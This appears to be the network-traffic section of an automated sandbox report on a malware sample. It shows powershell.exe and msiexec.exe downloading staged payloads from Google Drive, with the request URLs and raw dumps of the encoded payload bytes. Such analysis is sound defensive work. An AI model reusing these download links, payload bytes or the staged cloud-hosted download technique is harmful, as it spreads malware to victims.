                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Sep 30, 2024 09:57:20.808336020 CEST1.1.1.1192.168.2.50xb85bNo error (0)drive.google.com172.217.18.14A (IP address)IN (0x0001)false
                                              Sep 30, 2024 09:57:21.873478889 CEST1.1.1.1192.168.2.50xf57aNo error (0)drive.usercontent.google.com142.250.186.33A (IP address)IN (0x0001)false
                                              Sep 30, 2024 09:58:00.666986942 CEST1.1.1.1192.168.2.50x8125No error (0)drive.google.com172.217.16.206A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • drive.google.com
                                              • drive.usercontent.google.com

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.549726172.217.18.144431788C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-30 07:57:21 UTC215OUTGET /uc?export=download&id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: drive.google.com
                                              Connection: Keep-Alive
                                              2024-09-30 07:57:21 UTC1610INHTTP/1.1 303 See Other
                                              Content-Type: application/binary
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Mon, 30 Sep 2024 07:57:21 GMT
                                              Location: https://drive.usercontent.google.com/download?id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1&export=download
                                              Strict-Transport-Security: max-age=31536000
                                              Cross-Origin-Opener-Policy: same-origin
                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                              Content-Security-Policy: script-src 'nonce-naUBYsCK0OwWPzfSZSMWbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                              Server: ESF
                                              Content-Length: 0
                                              X-XSS-Protection: 0
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.549727142.250.186.334431788C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-30 07:57:22 UTC233OUTGET /download?id=1aJr3ENUZIKKZBmNbd6io0bC5vsII6aL1&export=download HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: drive.usercontent.google.com
                                              Connection: Keep-Alive
                                              2024-09-30 07:57:25 UTC4860INHTTP/1.1 200 OK
                                              Content-Type: application/octet-stream
                                              Content-Security-Policy: sandbox
                                              Content-Security-Policy: default-src 'none'
                                              Content-Security-Policy: frame-ancestors 'none'
                                              X-Content-Security-Policy: sandbox
                                              Cross-Origin-Opener-Policy: same-origin
                                              Cross-Origin-Embedder-Policy: require-corp
                                              Cross-Origin-Resource-Policy: same-site
                                              X-Content-Type-Options: nosniff
                                              Content-Disposition: attachment; filename="Pelsberederierne.hhk"
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: false
                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                              Accept-Ranges: bytes
                                              Content-Length: 478500
                                              Last-Modified: Mon, 30 Sep 2024 04:44:02 GMT
                                              X-GUploader-UploadID: AD-8ljvGTw1WXNRy7BeKZZdJblRxH9wHveuALGxht_cyPGsIpw5RsWOdJZ9n4TnWg2KdM24B-jGJVmuosg
                                              Date: Mon, 30 Sep 2024 07:57:25 GMT
                                              Expires: Mon, 30 Sep 2024 07:57:25 GMT
                                              Cache-Control: private, max-age=0
                                              X-Goog-Hash: crc32c=J7gn+A==
                                              Server: UploadServer
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close
                                              2024-09-30 07:57:25 UTC4860INData Raw: 63 51 47 62 36 77 4a 46 32 72 76 41 36 68 59 41 63 51 47 62 36 77 4a 6b 68 77 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 58 4a 4d 38 4f 33 45 42 6d 33 45 42 6d 34 48 42 51 62 42 59 32 4f 73 43 5a 7a 76 72 41 6a 7a 74 67 65 6d 64 51 35 55 54 63 51 47 62 36 77 4a 39 32 58 45 42 6d 33 45 42 6d 37 6f 74 2f 37 75 2f 36 77 4b 73 44 65 73 43 4d 51 74 78 41 5a 76 72 41 6c 4c 35 4d 63 70 78 41 5a 74 78 41 5a 75 4a 46 41 74 78 41 5a 74 78 41 5a 76 52 34 6e 45 42 6d 2b 73 43 77 37 4f 44 77 51 54 72 41 75 62 4c 63 51 47 62 67 66 6b 41 43 46 45 43 66 4d 33 72 41 73 5a 61 36 77 4b 50 79 49 74 45 4a 41 54 72 41 6a 38 63 36 77 4a 2f 6a 59 6e 44 63 51 47 62 63 51 47 62 67 63 4e 53 52 33 55 41 63 51 47 62 36 77 4a 39 30 4c 71 51 2f 32 6e 46 36 77 4b 68 44 2b 73 43 58 46 4b
                                              Data Ascii: cQGb6wJF2rvA6hYAcQGb6wJkhwNcJARxAZtxAZu5XJM8O3EBm3EBm4HBQbBY2OsCZzvrAjztgemdQ5UTcQGb6wJ92XEBm3EBm7ot/7u/6wKsDesCMQtxAZvrAlL5McpxAZtxAZuJFAtxAZtxAZvR4nEBm+sCw7ODwQTrAubLcQGbgfkACFECfM3rAsZa6wKPyItEJATrAj8c6wJ/jYnDcQGbcQGbgcNSR3UAcQGb6wJ90LqQ/2nF6wKhD+sCXFK
                                              2024-09-30 07:57:25 UTC4860INData Raw: 34 79 54 75 47 64 4b 33 39 7a 57 62 63 79 33 75 57 6b 41 74 64 70 43 37 4c 58 4a 46 67 74 38 76 7a 6a 38 57 43 66 6d 59 31 2f 64 4f 73 63 64 30 66 78 6a 2b 6d 65 6d 39 43 53 6b 4f 6a 6d 2f 6d 44 38 7a 6b 6d 59 45 4a 54 4a 37 79 35 42 48 48 53 74 56 78 37 52 4d 4b 73 72 69 47 75 56 62 78 65 35 45 49 6c 4a 6c 58 69 58 49 30 74 31 4f 77 74 44 33 61 4c 58 57 32 6a 50 38 53 62 32 4c 52 43 4d 44 74 47 47 61 75 65 35 76 37 61 34 78 7a 54 32 68 47 70 43 6b 2b 33 62 44 32 2f 4b 55 49 47 6f 55 69 2b 53 6c 6f 36 37 36 30 32 50 59 61 52 44 59 33 69 56 35 53 57 4d 4a 45 68 34 50 37 6a 66 4a 58 62 4f 74 77 6e 4a 31 54 62 79 6a 71 4d 31 33 46 6c 6b 39 43 71 67 62 33 50 39 6f 69 51 62 51 35 4b 63 35 67 76 4b 67 66 5a 31 76 65 48 50 66 32 74 54 30 77 48 52 72 4f 50 39 6f
                                              Data Ascii: 4yTuGdK39zWbcy3uWkAtdpC7LXJFgt8vzj8WCfmY1/dOscd0fxj+mem9CSkOjm/mD8zkmYEJTJ7y5BHHStVx7RMKsriGuVbxe5EIlJlXiXI0t1OwtD3aLXW2jP8Sb2LRCMDtGGaue5v7a4xzT2hGpCk+3bD2/KUIGoUi+Slo67602PYaRDY3iV5SWMJEh4P7jfJXbOtwnJ1TbyjqM13Flk9Cqgb3P9oiQbQ5Kc5gvKgfZ1veHPf2tT0wHRrOP9o
                                              2024-09-30 07:57:25 UTC121INData Raw: 65 6b 6f 59 48 78 74 78 6e 6f 73 37 48 77 45 55 32 35 65 4d 2b 47 4e 46 65 6c 42 6d 6d 78 39 33 41 66 55 46 56 62 52 55 37 46 7a 33 47 6d 57 5a 67 41 70 42 57 58 6c 62 30 6e 4d 2f 32 69 33 42 73 36 50 35 79 6a 2b 46 64 71 69 36 47 33 4a 30 38 51 39 30 36 4c 34 6f 75 64 54 62 6c 4b 77 6b 61 70 64 38 70 72 34 59 31 72 4f 73 4a 58 39 46 71 6f 6b 76 7a 6a 2b 4b 6c
                                              Data Ascii: ekoYHxtxnos7HwEU25eM+GNFelBmmx93AfUFVbRU7Fz3GmWZgApBWXlb0nM/2i3Bs6P5yj+Fdqi6G3J08Q906L4oudTblKwkapd8pr4Y1rOsJX9Fqokvzj+Kl
                                              2024-09-30 07:57:25 UTC1320INData Raw: 65 36 62 54 6c 6e 4c 45 4c 4b 67 57 77 6f 52 36 62 43 68 37 39 6d 5a 35 76 34 59 41 4f 5a 66 6e 55 63 50 49 4d 48 2f 4d 31 50 39 55 6c 7a 79 78 6f 63 7a 46 72 5a 2f 45 44 55 4f 4b 47 47 4f 6d 45 73 79 35 4d 6e 63 72 50 6e 71 6d 2b 48 6e 48 47 79 4c 62 6a 41 52 65 53 68 66 6c 6d 2b 49 6c 31 74 51 73 39 31 50 31 63 4c 6f 72 43 35 62 33 36 30 6a 51 6c 39 50 7a 63 53 61 55 4a 4b 4d 73 55 66 5a 30 7a 74 54 75 78 4e 65 79 73 70 4f 52 37 65 43 4b 79 42 4b 4a 50 2b 75 44 50 47 47 5a 34 4c 33 71 54 64 5a 35 6c 4e 44 47 65 33 7a 5a 4a 30 52 47 49 53 6f 75 68 4a 7a 71 41 59 59 64 36 62 36 73 4b 7a 47 76 75 34 4a 41 6f 32 53 75 4d 45 2b 79 62 72 4f 50 39 6f 74 7a 6a 2f 61 4c 63 34 2f 32 69 33 4f 50 39 6f 74 7a 6a 2f 61 4c 63 34 2f 32 69 33 4f 50 2b 61 6f 33 71 63 4f
                                              Data Ascii: e6bTlnLELKgWwoR6bCh79mZ5v4YAOZfnUcPIMH/M1P9UlzyxoczFrZ/EDUOKGGOmEsy5MncrPnqm+HnHGyLbjAReShflm+Il1tQs91P1cLorC5b360jQl9PzcSaUJKMsUfZ0ztTuxNeyspOR7eCKyBKJP+uDPGGZ4L3qTdZ5lNDGe3zZJ0RGISouhJzqAYYd6b6sKzGvu4JAo2SuME+ybrOP9otzj/aLc4/2i3OP9otzj/aLc4/2i3OP+ao3qcO
                                              2024-09-30 07:57:25 UTC1390INData Raw: 6a 66 57 41 70 45 75 68 5a 37 73 71 38 49 70 32 73 33 36 6a 45 51 56 4b 4a 6d 39 5a 55 6b 56 6d 32 38 6d 48 69 77 6a 41 73 6e 78 35 73 33 77 39 72 48 49 36 44 62 31 41 52 79 6a 6b 7a 46 56 69 50 7a 49 47 62 46 33 66 77 4c 6e 39 2b 35 34 72 51 56 74 53 37 32 70 66 38 63 6a 69 66 4b 44 35 74 77 55 69 62 54 6d 65 6b 38 47 38 6d 49 48 59 2b 64 48 47 71 6a 44 42 39 6b 7a 7a 44 79 34 61 50 77 4b 6d 6c 55 58 33 30 74 6d 55 62 67 41 50 74 6f 74 41 6b 4b 47 59 7a 31 52 2b 62 35 69 35 4b 71 55 4f 41 41 54 33 37 44 6d 4e 73 52 50 4a 55 56 74 73 4b 77 66 6a 74 61 2b 39 45 75 47 56 78 4a 4b 30 45 74 62 4b 65 72 6c 5a 6c 38 57 76 74 34 4a 68 6d 61 6f 36 45 38 54 2f 75 4f 7a 50 4d 68 2f 64 4b 41 67 7a 6a 47 2b 4b 45 54 61 45 30 4b 73 44 48 67 79 57 46 2b 2b 47 4b 44 57
                                              Data Ascii: jfWApEuhZ7sq8Ip2s36jEQVKJm9ZUkVm28mHiwjAsnx5s3w9rHI6Db1ARyjkzFViPzIGbF3fwLn9+54rQVtS72pf8cjifKD5twUibTmek8G8mIHY+dHGqjDB9kzzDy4aPwKmlUX30tmUbgAPtotAkKGYz1R+b5i5KqUOAAT37DmNsRPJUVtsKwfjta+9EuGVxJK0EtbKerlZl8Wvt4Jhmao6E8T/uOzPMh/dKAgzjG+KETaE0KsDHgyWF++GKDW
                                              2024-09-30 07:57:25 UTC1390INData Raw: 50 50 39 6f 69 7a 79 76 2b 4c 63 34 2f 32 69 33 4f 50 39 6f 74 7a 6a 2f 61 4c 63 34 2f 32 69 33 4f 50 39 6f 74 7a 6a 2f 61 4c 63 34 46 34 2b 37 6d 57 2f 70 31 36 45 74 4e 70 2f 2f 6e 72 44 2b 6d 66 2f 54 39 41 70 30 4d 57 45 56 36 6e 75 45 49 59 32 48 30 65 36 44 61 36 55 4a 64 6d 55 78 79 52 42 45 34 4e 74 70 2b 52 6a 6f 67 4b 69 43 76 45 30 35 36 39 51 41 5a 70 75 6b 4e 73 72 4f 4c 32 70 75 6a 72 4b 47 61 69 76 66 62 6e 58 70 78 31 32 2b 53 56 4c 34 31 4f 2b 59 31 49 4b 77 35 79 44 64 52 54 4c 34 64 35 5a 42 71 4b 4b 77 35 30 6d 55 7a 32 32 31 47 70 43 77 32 34 4c 44 33 78 36 45 33 65 75 73 75 34 2f 61 75 35 51 4c 55 45 2b 37 54 64 6e 47 52 45 56 59 42 39 49 64 2b 4b 61 6f 54 53 53 66 6d 6e 2b 6a 54 44 43 37 74 56 2b 4d 72 69 4e 70 2f 53 2f 66 6e 67 4b
                                              Data Ascii: PP9oizyv+Lc4/2i3OP9otzj/aLc4/2i3OP9otzj/aLc4F4+7mW/p16EtNp//nrD+mf/T9Ap0MWEV6nuEIY2H0e6Da6UJdmUxyRBE4Ntp+RjogKiCvE0569QAZpukNsrOL2pujrKGaivfbnXpx12+SVL41O+Y1IKw5yDdRTL4d5ZBqKKw50mUz221GpCw24LD3x6E3eusu4/au5QLUE+7TdnGREVYB9Id+KaoTSSfmn+jTDC7tV+MriNp/S/fngK
                                              2024-09-30 07:57:25 UTC1390INData Raw: 65 50 4f 50 39 6f 74 7a 6a 2f 61 4c 63 34 2f 32 69 33 4f 50 39 6f 74 7a 6a 2f 61 4c 63 34 2f 32 69 33 4f 50 2f 5a 34 45 4a 51 30 49 67 6b 4d 41 53 33 4f 50 39 6f 74 7a 6a 2f 61 4c 63 34 2f 32 69 33 4f 50 39 6f 74 7a 6a 2f 61 4c 63 34 2f 32 69 33 4f 41 6b 32 70 4a 72 6d 6c 58 74 6f 7a 54 53 69 7a 4c 6a 6f 6b 78 79 4a 30 62 71 42 58 39 78 4d 35 71 59 71 56 6b 37 6f 67 74 50 73 4f 4b 36 62 47 4f 6b 36 68 51 46 47 4d 73 55 66 5a 30 79 74 54 42 67 70 62 30 71 67 67 39 66 5a 4a 6f 58 31 6f 50 77 41 36 45 74 37 76 4a 72 35 64 72 4c 66 73 6f 39 4f 6e 56 77 6d 69 72 43 41 54 63 47 4f 78 2b 46 72 55 50 47 46 66 35 5a 62 7a 43 43 2f 32 77 4e 79 46 34 51 4f 41 34 46 33 6c 69 44 4f 4e 6f 4e 73 6d 64 55 31 32 33 49 54 4c 59 34 53 38 37 30 6b 45 43 57 74 76 75 46 44 6b
                                              Data Ascii: ePOP9otzj/aLc4/2i3OP9otzj/aLc4/2i3OP/Z4EJQ0IgkMAS3OP9otzj/aLc4/2i3OP9otzj/aLc4/2i3OAk2pJrmlXtozTSizLjokxyJ0bqBX9xM5qYqVk7ogtPsOK6bGOk6hQFGMsUfZ0ytTBgpb0qgg9fZJoX1oPwA6Et7vJr5drLfso9OnVwmirCATcGOx+FrUPGFf5ZbzCC/2wNyF4QOA4F3liDONoNsmdU123ITLY4S870kECWtvuFDk
                                              2024-09-30 07:57:25 UTC1390INData Raw: 65 49 50 2f 37 46 62 35 42 31 44 6f 71 53 70 56 66 39 31 4e 74 70 43 47 6b 7a 71 6b 38 56 2b 6c 4a 73 75 62 6d 44 4c 4c 4b 53 44 58 78 30 4a 69 62 67 45 52 48 6a 4e 4f 6a 75 2b 32 2b 42 73 55 45 5a 32 70 6f 70 79 41 6f 56 42 43 5a 51 46 53 6f 65 4f 6e 70 42 59 65 55 45 6b 68 4d 64 55 65 71 69 69 2f 4f 50 78 5a 71 41 78 75 56 56 4f 6b 45 42 78 2f 51 66 35 64 39 36 42 72 4b 50 7a 63 69 72 71 6b 42 70 47 4b 31 45 64 58 31 67 2b 73 41 57 67 78 2b 78 79 6c 32 73 6b 41 56 46 33 54 42 58 67 48 44 62 57 41 6a 50 43 7a 46 72 44 79 77 76 6e 46 56 76 6a 42 67 2f 33 42 65 70 4d 78 51 45 53 49 78 68 45 33 31 51 77 6d 34 72 76 36 36 47 46 41 6d 76 37 51 56 6c 4a 42 39 74 73 66 66 53 6d 70 76 45 6d 64 78 51 47 55 57 46 2b 66 6b 78 72 66 6b 53 64 33 48 6c 76 75 53 68 6e
                                              Data Ascii: eIP/7Fb5B1DoqSpVf91NtpCGkzqk8V+lJsubmDLLKSDXx0JibgERHjNOju+2+BsUEZ2popyAoVBCZQFSoeOnpBYeUEkhMdUeqii/OPxZqAxuVVOkEBx/Qf5d96BrKPzcirqkBpGK1EdX1g+sAWgx+xyl2skAVF3TBXgHDbWAjPCzFrDywvnFVvjBg/3BepMxQESIxhE31Qwm4rv66GFAmv7QVlJB9tsffSmpvEmdxQGUWF+fkxrfkSd3HlvuShn
                                              2024-09-30 07:57:25 UTC1390INData Raw: 4b 70 79 6f 6b 31 46 51 54 75 6d 4e 75 72 38 34 36 59 74 74 75 66 4c 72 2b 45 6f 56 37 59 4d 65 77 4a 49 68 59 5a 6a 2f 47 37 6d 6c 46 63 6a 6f 4d 79 4e 55 76 75 6a 67 79 43 75 4b 4e 69 63 68 56 2b 47 31 72 51 73 4e 75 53 47 42 47 68 4c 5a 72 51 5a 54 4e 58 68 2b 54 6e 5a 6d 56 33 2b 43 6d 2b 30 62 32 6e 4d 50 39 71 6b 65 39 6a 62 4c 63 36 32 50 48 75 63 68 54 2f 58 64 69 46 62 78 79 69 2b 7a 2f 68 50 7a 64 75 6d 47 67 39 62 33 7a 44 4e 72 56 53 64 6f 31 50 4f 7a 79 78 48 53 2f 66 46 71 53 38 51 77 2b 31 71 4c 4a 44 43 6c 2b 72 56 42 74 36 4a 41 37 7a 6d 64 54 72 67 59 76 6f 6e 57 73 48 52 75 4f 33 4e 34 44 6f 42 46 52 64 6b 76 42 51 55 5a 56 47 59 4b 54 37 61 4c 61 67 77 48 52 37 4f 50 39 6f 74 7a 6a 2f 61 4c 63 34 2f 32 69 33 4f 50 39 6f 74 7a 6a 2f 61
                                              Data Ascii: Kpyok1FQTumNur846YttufLr+EoV7YMewJIhYZj/G7mlFcjoMyNUvujgyCuKNichV+G1rQsNuSGBGhLZrQZTNXh+TnZmV3+Cm+0b2nMP9qke9jbLc62PHuchT/XdiFbxyi+z/hPzdumGg9b3zDNrVSdo1POzyxHS/fFqS8Qw+1qLJDCl+rVBt6JA7zmdTrgYvonWsHRuO3N4DoBFRdkvBQUZVGYKT7aLagwHR7OP9otzj/aLc4/2i3OP9otzj/a
                                              2024-09-30 07:57:25 UTC1390INData Raw: 6d 79 42 41 6d 71 49 71 5a 59 58 2f 70 57 67 6f 4a 34 6f 59 45 63 2f 68 4e 57 56 2f 2f 6c 4d 6b 59 4a 4a 58 41 54 37 58 4f 50 39 72 68 4c 6b 51 71 44 6a 6d 69 69 4e 52 64 5a 68 53 2f 64 53 68 65 45 4d 63 54 55 31 71 65 63 76 68 4c 52 6b 45 64 76 44 4d 52 77 65 53 65 68 35 57 41 33 48 4c 76 33 75 53 70 65 52 6a 61 4e 5a 61 65 2b 35 64 57 35 5a 4e 75 52 71 51 76 4e 74 75 77 71 4c 6f 68 56 2b 73 77 74 4d 4c 68 4a 31 65 5a 37 30 62 71 73 43 65 38 65 62 6a 38 55 53 4f 33 61 34 34 69 34 70 2b 59 4d 6a 53 53 48 75 74 48 6f 6c 6e 49 62 56 45 70 44 59 4a 46 2f 55 70 39 77 77 59 44 64 50 62 43 67 73 55 53 78 53 58 53 52 58 50 2b 4a 55 55 2b 69 70 55 71 72 49 70 45 2b 36 46 58 62 43 6b 36 58 4d 38 67 54 6f 6d 78 52 39 7a 54 4c 6c 4e 5a 34 39 57 33 4a 31 66 4f 51 59
                                              Data Ascii: myBAmqIqZYX/pWgoJ4oYEc/hNWV//lMkYJJXAT7XOP9rhLkQqDjmiiNRdZhS/dSheEMcTU1qecvhLRkEdvDMRweSeh5WA3HLv3uSpeRjaNZae+5dW5ZNuRqQvNtuwqLohV+swtMLhJ1eZ70bqsCe8ebj8USO3a44i4p+YMjSSHutHolnIbVEpDYJF/Up9wwYDdPbCgsUSxSXSRXP+JUU+ipUqrIpE+6FXbCk6XM8gTomxR9zTLlNZ49W3J1fOQY


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.549733172.217.16.2064431632C:\Windows\SysWOW64\msiexec.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-30 07:58:01 UTC216OUTGET /uc?export=download&id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: drive.google.com
                                              Cache-Control: no-cache
                                              2024-09-30 07:58:01 UTC1610INHTTP/1.1 303 See Other
                                              Content-Type: application/binary
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Mon, 30 Sep 2024 07:58:01 GMT
                                              Location: https://drive.usercontent.google.com/download?id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y&export=download
                                              Strict-Transport-Security: max-age=31536000
                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                              Cross-Origin-Opener-Policy: same-origin
                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                              Content-Security-Policy: script-src 'nonce-v4yLWfiSUc7uweyA3D8qaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                              Server: ESF
                                              Content-Length: 0
                                              X-XSS-Protection: 0
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.549734142.250.186.334431632C:\Windows\SysWOW64\msiexec.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-30 07:58:02 UTC258OUTGET /download?id=1TCrKEm5gkVToVcX1hHdm-2VGdJUjc69Y&export=download HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Cache-Control: no-cache
                                              Host: drive.usercontent.google.com
                                              Connection: Keep-Alive
                                              2024-09-30 07:58:05 UTC4861INHTTP/1.1 200 OK
                                              Content-Type: application/octet-stream
                                              Content-Security-Policy: sandbox
                                              Content-Security-Policy: default-src 'none'
                                              Content-Security-Policy: frame-ancestors 'none'
                                              X-Content-Security-Policy: sandbox
                                              Cross-Origin-Opener-Policy: same-origin
                                              Cross-Origin-Embedder-Policy: require-corp
                                              Cross-Origin-Resource-Policy: same-site
                                              X-Content-Type-Options: nosniff
                                              Content-Disposition: attachment; filename="taILrrpnLxtUyEfE8.bin"
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: false
                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                              Accept-Ranges: bytes
                                              Content-Length: 494656
                                              Last-Modified: Mon, 30 Sep 2024 04:42:22 GMT
                                              X-GUploader-UploadID: AD-8ljvsXpTe88CUsLK3uf4a0Gpy9oyapjYK0KqQd5159qd7DXoYMBts5_FziQzDJFiGr9b0gqNird44Lg
                                              Date: Mon, 30 Sep 2024 07:58:05 GMT
                                              Expires: Mon, 30 Sep 2024 07:58:05 GMT
                                              Cache-Control: private, max-age=0
                                              X-Goog-Hash: crc32c=P9b0ow==
                                              Server: UploadServer
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close
                                              2024-09-30 07:58:05 UTC4861INData Raw: be f4 d0 d5 48 3b fa be 3d 28 18 a8 56 a6 08 82 70 03 0c 18 02 7a c7 d3 90 7a 0e e9 83 ee f5 c3 c0 85 20 3f 40 3f 3d 99 b7 d5 24 ef 11 4d 60 fd fe 83 b5 77 4d 6a e7 a5 ae 3e 66 d1 bf 94 ce 08 ca dc 89 d0 60 4e ed 39 7f cb 47 98 58 e8 6d b6 59 0c 8b 93 ec 2f 4d 9c 05 e7 c9 f3 c8 b7 1e 12 7f b0 50 bc 73 35 56 71 02 31 9d b4 58 dc 73 f0 c4 eb d0 be 05 21 94 f8 79 d7 0b cf cc e7 12 34 d5 cd 34 08 12 1b 00 55 f2 38 a4 76 21 fe 8c 3e 2a 05 74 f7 94 f3 f4 61 f2 24 5a f9 2a 68 92 20 92 d8 6d fe 1f 67 ca 1f cd d6 50 33 88 10 7d c1 18 59 7e c6 9e 2a 6b c3 2f 2e b0 c7 04 c7 11 82 a4 b1 84 41 d5 52 a9 30 05 b9 23 9b 49 3d e4 aa c2 d7 59 60 5f 4b f6 7e 8b 66 30 4e 1b 90 d1 8a 77 20 0a 39 4b b7 25 1e f8 dc 67 56 09 dd 1e 37 61 62 38 46 24 31 4d 8d 2e 91 59 ce 30 61 76
                                              Data Ascii: H;=(Vpzz ?@?=$M`wMj>f`N9GXmY/MPs5Vq1Xs!y44U8v!>*ta$Z*h mgP3}Y~*k/.AR0#I=Y`_K~f0Nw 9K%gV7ab8F$1M.Y0av
